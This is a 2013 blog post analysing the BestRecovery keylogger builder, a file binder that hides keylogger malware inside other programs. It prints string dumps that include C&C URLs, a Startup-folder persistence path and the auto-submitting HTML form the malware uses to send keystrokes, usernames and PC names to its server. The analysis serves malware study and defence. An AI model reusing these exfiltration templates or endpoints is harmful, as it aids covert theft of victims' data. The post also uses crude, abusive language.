Friday, September 13, 2013

BESTRECOVERY keylogger

The BestRecovery spy service provides users with a builder (the actual exe is called Builder.exe, however it is a file binder) that was used to create new keylogger malware for each customer to distribute to victims.

In a traditional botnet, for example Andromeda, bot clients are built using a builder application.. The bot master supplies the configuration data such as C&C gate and build ID and the builder pops out a new binary.
File binders are applications that allow a user to "bind" executables together resulting in a single executable. They are useful for crackers to insert other applications such as trojan horse executables into otherwise harmless files, making them more difficult to detect. (Source
 The first BestRecovery builder I came across was version 12.4




Ver 12.4 was a hideous awful mess of an application. 

Just looking at the builder makes me feel bad for the 419'ers using it. Not to mention I could not get this thing to kick out a useful sample. 



I had to run through the Error-FIXX directory and register some components. I forget, I was distracted by the horror show that is the ::: BESTRECOVERY BUILDER :::

Anyway, the admin updated the builder, I must have missed a few versions or he did it really quickly. The next time I checked the builder it was on 17.3 





I am a reverse engineer in training so I will do my best to figure out what the heck is going on under the hood.

I'm going to look at the builder itself and then the binded output file from the builder.

I used resource hacker to extract a file: (VT 28/47)
https://www.virustotal.com/en/file/aa02bcfd2997c889f730b33496b3635725be58039ab95f8cc4109fe50b62b50a/analysis/

Looks like this has been around the block already - I was not the first to get this on VT and its detection rate is high.


BestRecovery Builder v12.4 

All BestRecovery software can best be described as a copy/paste piece of shit.

I ran the 12.4 builder through "strings" and pulled out some data. The following is some useful details obtained from the BestRecovery 12.4 builder
Builder_12.4
BEST RECOVERY
BESTRECOVERY
BESTRECOVERY
C:\Users\yaisr\Downloads\bs_fusion\data\MSCOMCTL.oca
C:\Users\yaisr\Downloads\bs_fusion\data\mswinsck.oca
http://hamarakindking.com/Builder.exe
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Keyspy Will Not Be Responsible For Any Use/Misuse OF Other's Information
Ethics is Philosophical Study Of Moral Values & Rules. It is the motivation based on the ideas of Right & Wrong.
Professional Is A Person Engage in one of a Learned Professions.Who is the Expert in any particular Field Like Doctors,Engineers,Accountants Etc
The Idea is To Combine Both The above terms together To Make The Client Or Stakeholders Of any Profession Relax & Free From Worries & They Can Trust The Professional. Accountants are Deployed in many fields Forexample They Can contribute
To The Ecnomic Development Of Their Country & Global Economy.
They Can Act as Auditors,Financial managers.Accountants,So They Have A Very high Responsibility.Billions & Trillians OF Dollars & Pounds of shareholders,Bankers,Investors Are t Stake. If The Accountant Are biased Means Their Weath & Hard Earnings Of People (Pension Funds) Will Be At RISK.This is Why The Accountants Must Obey Some Sort of Ethics/Guidelines like IFAC Code Of Ethics & ACCA Code Of Ethics . Acca Code Of Ethics States That Accountants & its Members Must Have The Quality Of
1) Objectivity
2) Integrity
3) Professional Behaviour
4) Confidentiality
5) Professional Competence
Practitioner Needs To Behave & Seen To Behave In an Ethical Professional Manner. In His Professional Life He might Face some risky events or Delemas.Code ofEthics Says Accountatns must use their Ethical Judgment To Avoid & Resolve The Ethical Delemas & Be away from Conflict of Interest.Threats he May Be Facing can Be Of Many Types Like
phppost
http://aineyhosting.com/web.php
httppath
http://www.financetasksforce.com/ht.txt
Exif
Ducky
mhttp://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:23C5E3E8B0A4E0119B2AC28829143BAE" xmpMM:DocumentID="xmp.did:FE1ECDCBA4B011E0B3EA880C2BEAE119" xmpMM:InstanceID="xmp.iid:FE1ECDCAA4B011E0B3EA880C2BEAE119" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24C5E3E8B0A4E0119B2AC28829143BAE" stRef:documentID="xmp.did:23C5E3E8B0A4E0119B2AC28829143BAE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
LED Table Marquee
(http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=60188&lngWId=1)
BEST-RECOVERY
Lavf53.20.0 (mpeg encoder?)
LAME3.98.4
LAME3.98.4
LAME3.98.4
RIFFL
WAVEfmt

SOFTWARE\Borland\Delphi\RTL
Software\Borland\Delphi\Locales
Delphi%.8X
MFS_ENABLED
TGIFPainter (Delphi image function)
Delphi Picture
Delphi Component
NETSCAPE 2.0 ANIMEXTS1.0
Resource Hacker
RICHEDIT
System\CurrentControlSet\Control\Keyboard Layouts\%.8x

The Visual Component Library (VCL) is a set of visual components for the rapid development of Windows applications in the Delphi and C++ languages.
TImeMode
imDisable
imClose
imOpen
imDontCare
imSAlpha
imAlpha
imHira
imSKata
imKata imChinese
imSHanguel imHanguel

BestRecovery Builder v17.3

Interesting strings from the 17.3 builder.

C:\Users\yaisr\Desktop\Clon\1.pdb

C:\Users\yaisr\Desktop\BEST-RECOVERY\Error-FIXX\mswinsck.oca

SETTINGS:
phppost
http://aineyhosting.com/web.php
httppath
http://www.financetasksforce.com/ht.txt


BestRecovery Keylogger from Builder v17.3

I used the v17.3 builder to create an output sample. I chose putty.exe as my target file to bind the BR keylogger to.


Strings from builder output file:

<html>
<head>
</head>
<body>
<form method="POST" action="
teenk
"></p>
  <p>NOT:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="note" size="20" value="
saatk
</textarea></p>
<p>&nbsp;</p>
  <p><input type="submit" value="hm" name="B1"></p>
</form>
<body onload="document.forms[0].submit();">
</body>
</html>
chek
"></p>
  <p>MSG:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <textarea rows="2" name="log" cols="7">
pank
"></p>
  <p>US:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="user" size="20" value="
"></p>
  <p>COUNT:&nbsp; <input type="text" name="country" size="20" value="
dook
  <p>
  PC:&nbsp;&nbsp;&nbsp;
  <input type="text" name="pcname" size="20" value="
<html>
<head>
</head>
<body>
<form method="POST" action="


http://www.samair.ru/proxy/proxychecker/country.htm
Checks what country the users are from.  
http://achanbhai.com/bai.php
http://wirelesstecho.com/achabai.txt
C:\Users\yaisr\Desktop\Clon\1.pdb

This looks awful.

This cant be serious...but I think it is.

ReadyState
ieframe.dll
SHDocVwCtl.WebBrowser
WebBrowser

So it looks like someone created a shitty keylogger (probably ripped the code) and the design they came up with to send data back to the C&C was to create a browser window, build an html form, and finally post back the data.. oh yeah, also you need to check samair.ru proxy checker to get the user country first.

Fuck me, thats retarded.


Resource hacker extracted the original putty from the output file and its clean.

extracted resource (putty)
https://www.virustotal.com/en/file/abcc2a2d828b1624459cf8c4d2ccdfdcde62c8d1ab51e438db200ab3c5c8cd17/analysis/1379011357/

However, the entire binded package itself is naughty

image (binded file) (VT 9/47)
https://www.virustotal.com/en/file/cb8757540e6d60e95a2187e734fec2d64fe5010f79b2e5fc2b1f7cc0291e8b89/analysis/1379011648/

https://malwr.com/analysis/OTc2Yzc3MzU4MzEyNGZjNDljNGMzMWIyOGM3ZjA1M2E/

(more samples I have found searching)
https://malwr.com/analysis/ODc4ZDM4MzRhOGE0NDY3M2JkMGM2OTg4MmRjYTM3MWQ/


Summary

The BestRecovery system is a hodgepodge of code that is held together by poor design.


I will be posting more again soon. Stay tuned for "Who is behind BestRecovery" ..


Other Links:

http://home.mcafee.com/virusinfo/virusprofile.aspx?key=3564054#none

No comments:

Post a Comment